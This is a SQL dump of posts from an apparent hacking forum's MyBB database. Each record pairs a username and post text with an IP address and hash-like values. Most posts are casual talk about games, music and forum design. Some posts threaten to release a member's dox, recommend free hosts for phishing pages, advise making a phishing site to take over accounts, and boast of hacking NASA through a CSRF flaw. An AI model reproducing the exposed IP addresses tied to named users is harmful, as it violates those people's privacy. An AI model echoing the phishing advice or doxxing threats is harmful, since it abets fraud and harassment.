'Exposé', '1350536763', 'Yeh I will when I do the pastebin version :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9bb6e281098e6b70660c989be265996f', '0', '0'); INSERT INTO mybb_posts VALUES('5266', '877', '4747', '11', 'RE: could some one teach how to hack facebook tetrisfreinds', '0', '257', 'XxTREYZxX', '1350536807', 'the game on face book its tetris but you vs people :)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '71c94dda67df769dcde08265a0545ee2', '0', '0'); INSERT INTO mybb_posts VALUES('5267', '939', '0', '49', 'a contest', '0', '257', 'XxTREYZxX', '1350542350', 'hel L33T,\r\ni think we should do a free elite member ship contest where you say why you should get the member ship!\r\nwho agrees', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'c67b6004cf2984a9de60b3ccf9b67d65', '0', '0'); INSERT INTO mybb_posts VALUES('5268', '939', '5267', '49', 'RE: a contest', '0', '222', 'Exposé', '1350542766', 'The admin\'s have given out enough free elite in my opinion. You have to buy it if you want it...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'dad718d3b6d84844de0e72433a3fbdca', '0', '0'); INSERT INTO mybb_posts VALUES('5269', '939', '5267', '49', 'RE: a contest', '0', '257', 'XxTREYZxX', '1350542854', 'oh really i didnt know sorry i will close this thread ahah lol', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '3eb1d0cf222a996590b0709d39d10bd4', '0', '0'); INSERT INTO mybb_posts VALUES('5270', '940', '0', '7', 'TheAnarchist I have your dox!', '0', '222', 'Exposé', '1350542961', 'Yes TheAnarchist if you see this I have your dox. So don\'t think nobody can find who you are...even though it took me some time I finally found you sir. So stop fuckin with LH or I will release it.\r\n\r\nI have not released it to anyone yet....\r\n\r\nSo please stop having your members register. It\'s getting old and very immature. Thanks\r\n\r\nHave a great day yall :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '8d4a5031a977502f183c114a0c6372f8', '0', '0'); INSERT INTO mybb_posts VALUES('5271', '941', '0', '35', 'Logo Competition for LH?', '0', '222', 'Exposé', '1350543143', 'I think we should have a logo contest..in my opinion we need a badass logo and we should turn it into a competition. Nothing hardcore but a fun activity on LH....\r\n\r\nIf the admins agree we need a new logo we can start this :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e3175f6f8b155eaf45410c5bb24d5c00', '0', '0'); INSERT INTO mybb_posts VALUES('5272', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '257', 'XxTREYZxX', '1350543488', 'i agree i this would be awesome:)\ngreat idea my self did not think of this:)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '2896e4e5673ff3dab9c32f0af182c1cb', '0', '0'); INSERT INTO mybb_posts VALUES('5273', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '222', 'Exposé', '1350543601', 'And I also think the header needs to be redesigned so the logo can go in the middle :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b4115b446207a48f880125409f156edf', '0', '0'); INSERT INTO mybb_posts VALUES('5274', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '257', 'XxTREYZxX', '1350543764', 'yeah true you are one smart cookie', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '0cdf73ed4045e623446bdbd4d4f49134', '0', '0'); INSERT INTO mybb_posts VALUES('5275', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '222', 'Exposé', '1350543923', 'Oh alright can I check it out? What do you have to pm me it?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '47dc607d2d4ec5f49b2b89319de17423', '0', '0'); INSERT INTO mybb_posts VALUES('5276', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '258', 'PiXEL^OG', '1350544194', 'Bin hoster is probably the best free hosting for anaything. You basically get unlimited EVERTHING!!! Bandwidth , space , mysql , addon domains etc\n\nSeriously you should take a look at it!!', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'b2fa780a2cec4545dd825b8a5dcdb8a3', '0', '0'); INSERT INTO mybb_posts VALUES('5277', '942', '0', '49', 'DDos protected hosting?', '0', '222', 'Exposé', '1350544212', 'Can we get DDos protected hosting? So we don\'t have to worry about ddos attacks....?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9167f560a457960b22d36e887757d8cb', '0', '0'); INSERT INTO mybb_posts VALUES('5278', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '257', 'XxTREYZxX', '1350544480', 'whats this supposed to mean i am confused \n+3 on this one lol. I\'m wondering why Kody isn\'t picking up the phone.', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '64876a462b8a89452789eb34798cb72c', '0', '0'); INSERT INTO mybb_posts VALUES('5279', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '258', 'PiXEL^OG', '1350544597', 'Actually the admin can get cloudflare DDos protection but it costs extra', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '545e89794b1a0c660774b1f5d95ebf50', '0', '0'); INSERT INTO mybb_posts VALUES('5280', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '222', 'Exposé', '1350544735', 'I think we already have cloudflare...not sure if it works tho lmao...I think we got hit like 5 min ago', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '55a2a2ab617c60c887d1e6b7e6483355', '0', '0'); INSERT INTO mybb_posts VALUES('5281', '918', '5088', '65', 'RE: I feel famous', '0', '258', 'PiXEL^OG', '1350544811', 'Umm the dude in the video is famous , not you \n\nPlus ive got like 127 000 views in a video i posted of south park and my channel has like 234 000 total views though 14 year old kids have gotten up to 5 million plus a Machinima Partnership', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'babc596ab281ac754248559d97c3dfdd', '0', '0'); INSERT INTO mybb_posts VALUES('5282', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '67', 'HoverCatz', '1350544871', 'http://1.bp.blogspot.com/-0iLJgxXE6gA/UH3Hm2ET6tI/AAAAAAAAJ_w/_Ch9uZRi-kQ/s1600/A5RlS7uCIAAZ_5H+copy-1.jpg', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', '11efaa284c4aefd42d63744376f12540', '0', '0'); INSERT INTO mybb_posts VALUES('5283', '943', '0', '74', 'MINECRAFT PREMIUM GIVEAWAY(no surveys)', '17', '257', 'XxTREYZxX', '1350544909', '[size=large][/size]hey l33T today im doing i am giving a minecraft premium \nif you want a minecraft premium must have 50 post and +rep \npm me for the account :)\ndont be mean or no one gets the account \ni could be doing some shit as survey but i\'m not so be nice :)\npm me for the account first 15 get one,\nget here quick bye , hope you enjoy\n1 down', '203.104.11.7', '-882373881', '1', '0', '257', '1350553775', '1', '13cae15678c8859722df9cef2f453035', '0', '1350553775'); INSERT INTO mybb_posts VALUES('5284', '944', '0', '66', 'What\'s your BF3 Method-ology?', '0', '222', 'Exposé', '1350544960', 'Meaning what do you do in game? I mostly rush in urban places and then in rural places I will snipe..\r\n\r\nWhat\'s your method-ology?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '377157feb310a709df4ff189e3897962', '0', '0'); INSERT INTO mybb_posts VALUES('5285', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '258', 'PiXEL^OG', '1350545070', 'NASA dose not care if their site gets hacked , their work and docs are saved ON PAPER IN FILING CABINETS\n\nThe reason why they have a site is so that average people who don\'t know much about them can lookup info on their site\n\nEven i hacked NASA like twice with a CSRF vul the first one used to work but they patced it , i found a new one i might post it if enough people are interested', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'b152b29c795b403d4779be0c22b6d499', '0', '0'); INSERT INTO mybb_posts VALUES('5286', '944', '5284', '66', 'RE: What\'s your BF3 Method-ology?', '0', '257', 'XxTREYZxX', '1350545128', 'my method is play smart and know what your opposition is going to do \ni will probably own a part of the map the is loaded with people and keep running around own\'ing', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', '37ee9fe3b5d463c4793f3d04b4e75f80', '0', '0'); INSERT INTO mybb_posts VALUES('5287', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '53', 'sirchamp', '1350545418', 'We have ddos protection. Not even my cloudflare ip getter could get the real ip of this site.', '195.197.239.82', '-1010438318', '1', '0', '0', '0', '1', 'f9f25ae9af020338a39e44f9569db240', '0', '0'); INSERT INTO mybb_posts VALUES('5288', '945', '0', '7', 'I dont want.......', '0', '67', 'HoverCatz', '1350545423', 'Hi. I dont want this forum to be like HF -> Pm me and post to get the download. When i started here every download was in the thread, not in my inbox. This was even a rule, but i dont know what happened with that rule.', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', '7d25364fac304ac92df38c29cae521b8', '0', '0'); INSERT INTO mybb_posts VALUES('5289', '945', '5288', '7', 'RE: I dont want.......', '0', '222', 'Exposé', '1350545705', 'Well yes I agree. People should post the download in their thread and not say \"Post and pm me for download\"', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '75eb06a0f7950fa4f2337ed92eea7118', '0', '0'); INSERT INTO mybb_posts VALUES('5290', '945', '5288', '7', 'RE: I dont want.......', '0', '257', 'XxTREYZxX', '1350545876', 'i think they do that because people just download it and take notice of what they did.and they dont say thanks for a great share:)', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'de16395e2fb0c22b2ec390317330a8a8', '0', '0'); INSERT INTO mybb_posts VALUES('5291', '942', '5277', '49', 'RE: DDos protected hosting?', '0', '222', 'Exposé', '1350545963', 'Lmao...idk...just wanted to make sure..we went down like 30 min ago', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ac00ca2a08e76e20beabaddb7cb42054', '0', '0'); INSERT INTO mybb_posts VALUES('5292', '945', '5288', '7', 'RE: I dont want.......', '0', '258', 'PiXEL^OG', '1350546367', 'IKR!! Like ive seen this on MANY other forums before , usually when someone says \"PM me for download link\" its usually someone trying to infect members , be careful everyone', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '0f5340dd117d220f5573a0807a5f1fc5', '0', '0'); INSERT INTO mybb_posts VALUES('5293', '946', '0', '19', '[Junk]Delete the dam stars :P', '0', '222', 'Exposé', '1350546805', 'Lol if you see underneath the username...\r\n\r\n[img]http://grab.by/gQwG[/img]\r\n\r\nthe stars don\'t have any use....so I think they should be deleted...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '49bdbfdd7c4b186e967aae372a529555', '0', '0'); INSERT INTO mybb_posts VALUES('5294', '43', '105', '7', 'RE: How did you find us?', '0', '258', 'PiXEL^OG', '1350546941', 'You PMed me on another forum and i was like Ok yeah sure :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'f4901d5330c86a1f3bc5211f881cfc92', '0', '0'); INSERT INTO mybb_posts VALUES('5295', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '258', 'PiXEL^OG', '1350547881', 'I think they look cool , It gives you motivation to join groups and get Elite', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '591c8f99a4d6590d5f8d71944d2f40db', '0', '0'); INSERT INTO mybb_posts VALUES('5296', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '222', 'Exposé', '1350547954', 'Oh I guess..just a suggestion :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '2e8ccc72f05ede34ce0821615b493fd6', '0', '0'); INSERT INTO mybb_posts VALUES('5297', '921', '5229', '4', 'RE: Hey', '0', '270', 'LCS', '1350547957', '[quote=\'t3h jok3r\' pid=\'5229\' dateline=\'1350526136\']\r\nWelcome to L33Thacking.\r\n[/quote]\r\n\r\nYou just copied over 9000 other people.\r\n\r\nI\'m joking, I understand that you\'re the admin. Welcome to l33t. Stay active + HQ.', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'c00d493f2a015e0cebdaf38807e3bcb0', '0', '0'); INSERT INTO mybb_posts VALUES('5298', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '53', 'sirchamp', '1350547971', 'I like them. ...Dont delete them .', '112.211.130.93', '1892909661', '1', '0', '0', '0', '1', '502423d8dd415d28f4ae31df94845ca6', '0', '0'); INSERT INTO mybb_posts VALUES('5299', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '222', 'Exposé', '1350548039', 'Oh nvm guys people seem to like them so....closed :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '34033d377fe2a6d870374db5e91fe243', '0', '0'); INSERT INTO mybb_posts VALUES('5300', '922', '5183', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350548104', '[quote=\'R?????zo?\' pid=\'5183\' dateline=\'1350511669\']\r\n[quote=\'LCS\' pid=\'5161\' dateline=\'1350501826\']\r\n[quote=\'R?????zo?\' pid=\'5139\' dateline=\'1350500540\']\r\nLook promising. I\'m not in US though, will this work if I have a VPN?\r\nNice thread anyways.\r\n[/quote]\r\n\r\nIt is promosing :) Yeah it\'ll work if you use a VPN, although if its a public one it might say you\'ve already completed some surveys. Not too sure.\r\n\r\nThanks! :)\r\n[/quote]\r\n\r\nDoes not work with a VPN, and I use a paid one\r\n[spoiler]\r\n[img]http://i.imgur.com/pkLQC.png[/img]\r\n[/spoiler]\r\n[/quote]\r\n\r\nNo idea then, sorry. You don\'t have to be in the US anyway to use it; its worldwide.', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'b298a54dae81ba23f71815aeb33d5701', '0', '0'); INSERT INTO mybb_posts VALUES('5301', '921', '5297', '4', 'RE: Hey', '0', '222', 'Exposé', '1350548109', '[quote=\'LCS\' pid=\'5297\' dateline=\'1350547957\']\n[quote=\'t3h jok3r\' pid=\'5229\' dateline=\'1350526136\']\nWelcome to L33Thacking.\n[/quote]\n\nYou just copied over 9000 other people.\n\nI\'m joking, I understand that you\'re the admin. Welcome to l33t. Stay active + HQ.\n[/quote]\n\nJok3r ban him...for talkin trash to you.....omnomnom :P jkjk', '74.76.76.132', '1246514308', '1', '0', '222', '1350548122', '1', '54c3a9bdd5cd16e8603b0e5598967e57', '0', '1350548122'); INSERT INTO mybb_posts VALUES('5302', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '258', 'PiXEL^OG', '1350548291', 'They are just jealous cuz we are so leet lol\n\nBut yeah AF seems kinda skidish', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '73cf1612dbb59e938d8235c0410d1e19', '0', '0'); INSERT INTO mybb_posts VALUES('5303', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '222', 'Exposé', '1350549376', 'This girl I work with is really cute...she has a BF tho, but flirts with me 24/7. Should I just go ahead and bang her and not give a fuck. Or respect her situation and let her do her thing?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'cbd8f405e0f6be4c6b6c6822af4e79a2', '0', '0'); INSERT INTO mybb_posts VALUES('5304', '918', '5281', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350549497', '[quote=\'XTr3ME PiX3L\' pid=\'5281\' dateline=\'1350544811\']\r\nUmm the dude in the video is famous , not you \r\n\r\nPlus ive got like 127 000 views in a video i posted of south park and my channel has like 234 000 total views though 14 year old kids have gotten up to 5 million plus a Machinima Partnership\r\n[/quote]\r\nIf I did get offered a Machinima Partnership, I would say no, it is the most stupid you can do EVER.\r\nThey don\'t pay as much as other networks, it takes one year to leave them and alot more.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '73d6f6f949ef683153e44965a1651b78', '0', '0'); INSERT INTO mybb_posts VALUES('5305', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '222', 'Exposé', '1350549594', 'Did Black ops 2 already come out or what?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'abb49726332505586cd1501a4f0e20b9', '0', '0'); INSERT INTO mybb_posts VALUES('5306', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350549856', 'no this is for just the original black ops sorry \nfor the confusion?', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '2b47f81a0481ffb9ed16ec4155e21c74', '0', '0'); INSERT INTO mybb_posts VALUES('5307', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '258', 'PiXEL^OG', '1350550016', 'I don\'t see a point in them... It just uses up my free memory', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'e0bacb30a848478c0af3d1278864aa61', '0', '0'); INSERT INTO mybb_posts VALUES('5308', '918', '5304', '65', 'RE: I feel famous', '0', '258', 'PiXEL^OG', '1350550157', '[quote=\'D?ea\' pid=\'5304\' dateline=\'1350549497\']\r\n[quote=\'XTr3ME PiX3L\' pid=\'5281\' dateline=\'1350544811\']\r\nUmm the dude in the video is famous , not you \r\n\r\nPlus ive got like 127 000 views in a video i posted of south park and my channel has like 234 000 total views though 14 year old kids have gotten up to 5 million plus a Machinima Partnership\r\n[/quote]\r\nIf I did get offered a Machinima Partnership, I would say no, it is the most stupid you can do EVER.\r\nThey don\'t pay as much as other networks, it takes one year to leave them and alot more.\r\n[/quote]\r\n\r\nYeah i know that , but its not easy to get a legit one also i think they have a life time contract so that you can\'t leave ever!!', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '63cfa031399dc701db86dc923ae9e1c1', '0', '0'); INSERT INTO mybb_posts VALUES('5309', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '62', 'R?????zo?', '1350550345', 'Gratz LH on 5k posts, thanks everyone who posted :)', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '9dff233f26b86243ca94389571aa446a', '0', '0'); INSERT INTO mybb_posts VALUES('5310', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '258', 'PiXEL^OG', '1350550390', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5191\' dateline=\'1350519699\']\r\nKnife Zombies till you reach level 4 and then buy the AK74u, unless you can reach the M16 and Claymores. \r\n[/quote]\r\n\r\nThis one actually works , but its really old. Also you get more points by knifing', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '171ebd0252b7dd67e99f7ea2753fc854', '0', '0'); INSERT INTO mybb_posts VALUES('5311', '918', '5088', '65', 'RE: I feel famous', '0', '62', 'R?????zo?', '1350550572', 'Dont you get like loads of money if you partner with them though?', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '097447b09a73a00af2780fd40114121a', '0', '0'); INSERT INTO mybb_posts VALUES('5312', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '258', 'PiXEL^OG', '1350550636', 'Facebook is nothing short but moneymaking , Recently they are now putting ads in your news feed so they make money , they say its for \"server maintenance\" but they already make a shit ton without them\n\nAlso when i go on facebook and i see all these bimbos taking pics of their nasty lunch or like that typical stuff and not to mention that YOLO bullshit fucking pisses me off so much i wanna smash my computer\n\nThe site was good but since mid 2010 the site has gone to shit and its complete shit because its dominated by douche bags and such.', '139.190.235.246', '-1950422026', '0', '0', '258', '1350550827', '1', 'ce823cd66a65a61657ab654ac5a3cd74', '0', '1350550827'); INSERT INTO mybb_posts VALUES('5313', '872', '5307', '24', 'RE: Windows Updates, who uses It?', '0', '62', 'R?????zo?', '1350550644', '[quote=\'XTr3ME PiX3L\' pid=\'5307\' dateline=\'1350550016\']\r\nI don\'t see a point in them... It just uses up my free memory\r\n[/quote]\r\n\r\nExactly, microsoft update sucks :P', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '28d9d9e5f381767e08b6bba37b5b5b4b', '0', '0'); INSERT INTO mybb_posts VALUES('5314', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350550656', 'are these tips helpfull to you;s guys:)\nJW', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '74f8963920924042cc6d61f8b0332e87', '0', '0'); INSERT INTO mybb_posts VALUES('5315', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '62', 'R?????zo?', '1350550828', 'Nice tips, even though I don\'t play zombies anymore.\nKeep it coming.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '206d7464474297b1bf3004b1317b0e5d', '0', '0'); INSERT INTO mybb_posts VALUES('5316', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '62', 'R?????zo?', '1350550935', 'I will try then without it, once I get home.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'c43d15597b68f9290a84e69d62ad0cb0', '0', '0'); INSERT INTO mybb_posts VALUES('5317', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350551003', 'thanks an i will keep it coming reloadzor', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '3aa89b19b19a13d7e9dabcb8bfcf2820', '0', '0'); INSERT INTO mybb_posts VALUES('5318', '43', '105', '7', 'RE: How did you find us?', '0', '62', 'R?????zo?', '1350551223', 'Welcome everyone who\'s new, enjoy your stay and stay active\n:)', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'e3434a1d0b64e64aa20a09cb58146207', '0', '0'); INSERT INTO mybb_posts VALUES('5319', '945', '5288', '7', 'RE: I dont want.......', '0', '62', 'R?????zo?', '1350551400', 'I think the post and PM thing is to keep the thread alive, I\'ve posted few downloads here and nobody replies but has a ton of views, wonder why :P', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'ac3cc02770423f9c937e8cd247b542aa', '0', '0'); INSERT INTO mybb_posts VALUES('5320', '944', '5284', '66', 'RE: What\'s your BF3 Method-ology?', '0', '62', 'R?????zo?', '1350551549', 'I get to the chopper and stay like that the whole map :P\nIf I don\'t get it on time, I usually go and snipe dem noobs', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'f15406e4d04993225da36f288571c998', '0', '0'); INSERT INTO mybb_posts VALUES('5321', '918', '5311', '65', 'RE: I feel famous', '0', '258', 'PiXEL^OG', '1350551606', '[quote=\'R?????zo?\' pid=\'5311\' dateline=\'1350550572\']\r\nDont you get like loads of money if you partner with them though?\r\n[/quote]\r\n\r\nNaa , you get ONLY 20 dollars every month if your a small normal partner', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '9f56de1710f771e1d8b7f155ed609f72', '0', '0'); INSERT INTO mybb_posts VALUES('5322', '918', '5088', '65', 'RE: I feel famous', '0', '257', 'XxTREYZxX', '1350552493', 'so you should bud keep the good work up', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '9dbf5c9fb34709b70c2e6a9aac8dee56', '0', '0'); INSERT INTO mybb_posts VALUES('5323', '922', '5121', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '257', 'XxTREYZxX', '1350552748', 'looks great i\'m definitely gonna try it out :)', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', 'eab716cf7a6d75fd88a9699b4ea6d0b6', '0', '0'); INSERT INTO mybb_posts VALUES('5324', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '62', 'R?????zo?', '1350553173', 'What does this do?\nLol, who even code this :P', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '24786b82697382945e2ee8b9a37d52fd', '0', '0'); INSERT INTO mybb_posts VALUES('5325', '892', '4879', '8', 'RE: Post New And Awesome Songs Here !!!', '0', '257', 'XxTREYZxX', '1350553292', 'Gangnam style is pretty funny and so boss', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'f91a9e559c7bc84f4a4094396376813d', '0', '0'); INSERT INTO mybb_posts VALUES('5326', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '62', 'R?????zo?', '1350553336', 'This is not because the current logo was me who made it, but I personaly think it fits the forum theme and looks great, but better changes are always welcome.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '16b9c942f86f45bf5be95429be9e58fa', '0', '0'); INSERT INTO mybb_posts VALUES('5327', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '62', 'R?????zo?', '1350553478', 'Pm\'ing you right, this sounds cool.\nThanks for this bro.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '4e89317c87fdf91f1cfd5c42f93df363', '0', '0'); INSERT INTO mybb_posts VALUES('5328', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '222', 'Exposé', '1350553506', 'We need something more unique like fkn0wned. Something that makes us stand out. And we need to redesign the header so it looks better....and more neat', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1f1e52f702d5d1f52723643e41cb6348', '0', '0'); INSERT INTO mybb_posts VALUES('5329', '947', '0', '8', 'GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350553535', 'gangnam style is so boss who agrees \r\neverybody now \r\nop op op op op gangnam style , sexy ladies haah lol\r\ni saw him live at the x factor lol he such a funny dancer', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'e8803a977b9396bddba6ca8b9338a1c1', '0', '0'); INSERT INTO mybb_posts VALUES('5330', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '62', 'R?????zo?', '1350553583', 'Thanks for this, might come handy some day.', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '0f470a756f367441a3586e874192d3be', '0', '0'); INSERT INTO mybb_posts VALUES('5331', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '62', 'R?????zo?', '1350553754', 'Bro just bang her if you have a chance, YOLO :)', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'acb5b9f8dd24cab2d479531de2a31b82', '0', '0'); INSERT INTO mybb_posts VALUES('5332', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '257', 'XxTREYZxX', '1350553823', 'YOLO is the best explaination right here haha lol', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '6c4d7ad179fb11aa9fd0f9687c1b5100', '0', '0'); INSERT INTO mybb_posts VALUES('5333', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350554029', 'Yeah hes the best, even though I don\'t understand 80% of the lyrics it makes me laugh all the time, and I sing it on my own way lol', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', '421147d5f98c29d4d5c57c974fd73fd5', '0', '0'); INSERT INTO mybb_posts VALUES('5334', '892', '4879', '8', 'RE: Post New And Awesome Songs Here !!!', '0', '62', 'R?????zo?', '1350554104', 'Muse - Madness, couple months new but great song', '77.54.30.106', '1295392362', '1', '0', '0', '0', '1', 'a4fb6548778649dc03c2014adb810666', '0', '0'); INSERT INTO mybb_posts VALUES('5335', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350554136', 'yeah there is a English version on youtube\nand hes so funny', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2724851c82645eecbfd3a92a11cefd6c', '0', '0'); INSERT INTO mybb_posts VALUES('5336', '948', '0', '74', 'MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350554401', 'hello, and i just wanted to tell you about my brother map on minecraft its a castle pvp with chest scattered around\n my brother is only 8 so dont be mean and please download he will apprciate it alot \n\ndownload link:\nfixed:http://www.minecraftworldmap.com/worlds/6aAJL#/-1641/64/694/min/0/0\nthanks guys', '203.104.11.10', '-882373878', '1', '0', '257', '1350608556', '1', '689dd5878b565db1ee5bd35a8be03d6b', '0', '1350608556'); INSERT INTO mybb_posts VALUES('5337', '922', '5323', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350554787', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5323\' dateline=\'1350552748\']\r\nlooks great i\'m definitely gonna try it out :)\r\n[/quote]\r\n\r\nThanks! I hope you enjoy it! :)', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', 'cb443525a57f2f6c8bd4a8ec2abd45f9', '0', '0'); INSERT INTO mybb_posts VALUES('5338', '922', '5337', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '257', 'XxTREYZxX', '1350555393', '[quote=\'LCS\' pid=\'5337\' dateline=\'1350554787\']\r\n[quote=\'?(???)?TREYZ?(???)?\' pid=\'5323\' dateline=\'1350552748\']\r\nlooks great i\'m definitely gonna try it out :)\r\n[/quote]\r\n\r\nThanks! I hope you enjoy it! :)\r\n[/quote]\r\n\r\ni will enjoy \r\nand hope it turns out good:)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', 'c730074e73228968229045c428dba5de', '0', '0'); INSERT INTO mybb_posts VALUES('5339', '949', '0', '72', 'mw3 hack', '0', '257', 'XxTREYZxX', '1350555713', 'hey i\'v got a mw3 hack for you guys \r\nlink:www.youtube.com/watch?v=uzfzb59DP2w \r\ndownload link is in the description \r\nall rights go to XRandomHacksX\r\nplease hit that big like button \r\nthanks hope you enjoy :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '7099e9e3f2ada7bef8b945778923a917', '0', '0'); INSERT INTO mybb_posts VALUES('5340', '946', '5293', '19', 'RE: Delete the dam stars :P', '0', '228', 'VirtualLegend', '1350556466', 'it looks empty when the stars are gone\n[hr]\nThis thread has been junked.', '83.83.167.183', '1397991351', '1', '0', '228', '1350556939', '1', '5db9083830593761343bd65e3d463b9d', '0', '0'); INSERT INTO mybb_posts VALUES('5341', '877', '4747', '11', 'RE: could some one teach how to hack facebook tetrisfreinds', '0', '228', 'VirtualLegend', '1350556593', 'Just make a phishing site. And then give it to your victims', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2f1948206022d2b6db7fec9955868ccd', '0', '0'); INSERT INTO mybb_posts VALUES('5342', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '228', 'VirtualLegend', '1350556869', 'Already knew this, but nice tutorial', 